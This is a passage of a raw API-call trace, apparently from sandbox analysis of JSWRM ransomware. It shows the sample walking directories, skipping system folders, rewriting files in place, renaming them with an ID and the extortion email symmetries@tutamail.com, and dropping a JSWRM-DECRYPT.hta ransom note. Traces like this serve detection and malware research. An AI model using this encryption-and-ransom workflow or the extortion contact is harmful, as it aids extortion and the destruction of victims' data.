ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1510c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0058.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0058.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0058.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0058.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0058.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0058.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0058.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0058.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0058.853] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0058.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0058.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0058.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0058.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0058.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0058.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0058.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0058.853] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.853] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=86284) returned 1 [0058.854] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15100) returned 0x2471a8 [0058.854] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x15100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x15100, lpOverlapped=0x0) returned 1 [0058.861] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.861] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x15100, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x15100, lpOverlapped=0x0) returned 1 [0058.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.862] CloseHandle (hObject=0x3d4) returned 1 [0058.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0058.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0058.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0058.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0058.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2179e0 [0058.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0058.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0058.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2179e0 | out: hHeap=0x1e0000) returned 1 [0058.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.864] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0058.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0058.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0058.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0058.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0058.866] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.866] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0058.866] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0058.866] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0058.866] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0058.866] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0058.866] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0058.866] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0058.866] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0058.866] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0058.866] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0058.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0058.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241308, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0058.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0058.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0058.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0058.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0058.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0058.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0058.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.867] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.867] FindClose (in: hFindFile=0x232000 | out: hFindFile=0x232000) returned 1 [0058.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0058.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0058.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0058.867] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1033", cAlternateFileName="")) returned 1 [0058.867] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0058.867] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0058.867] lstrcmpiW (lpString1="1033", lpString2="...") returned 1 [0058.867] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0058.867] lstrcmpiW (lpString1="1033", lpString2="recovery") returned -1 [0058.867] lstrcmpiW (lpString1="1033", lpString2="perflogs") returned -1 [0058.867] lstrcmpiW (lpString1="1033", lpString2="documents and settings") returned -1 [0058.867] lstrcmpiW (lpString1="1033", lpString2="$RECYCLE.BIN") returned 1 [0058.867] lstrcmpiW (lpString1="1033", lpString2="system volume information") returned -1 [0058.867] lstrcmpiW (lpString1="1033", lpString2="msocache") returned -1 [0058.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0058.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0058.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225ab0 [0058.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0058.868] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1033\\jswrm-decrypt.hta")) returned 0xffffffff [0058.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225ab0 | out: hHeap=0x1e0000) returned 1 [0058.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0058.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0058.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0058.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2266b0 [0058.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0058.923] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1033\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0058.925] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.925] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0058.926] CloseHandle (hObject=0x450) returned 1 [0058.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2266b0 | out: hHeap=0x1e0000) returned 1 [0058.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0058.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0058.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0058.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2261b0 [0058.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0058.927] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1033\\jswrm-decrypt.hta")) returned 0x20 [0058.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2261b0 | out: hHeap=0x1e0000) returned 1 [0058.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0058.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0058.927] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19c899d1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x231c00 [0058.927] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.927] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19c899d1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0058.927] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.927] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.927] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0xd723cc00, ftLastWriteTime.dwHighDateTime=0x1cabb47, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.927] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0058.927] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0058.927] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0058.927] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0058.927] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0058.927] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0058.927] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0058.927] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0058.928] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0058.928] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0058.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0058.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0058.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0058.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0058.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0058.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0058.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0058.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0058.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0058.928] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.928] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=3188) returned 1 [0058.928] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc70) returned 0x23dc88 [0058.928] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0xc70, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0xc70, lpOverlapped=0x0) returned 1 [0058.930] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.930] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0xc70, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0xc70, lpOverlapped=0x0) returned 1 [0058.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0058.930] CloseHandle (hObject=0x3d4) returned 1 [0058.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0058.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0058.931] 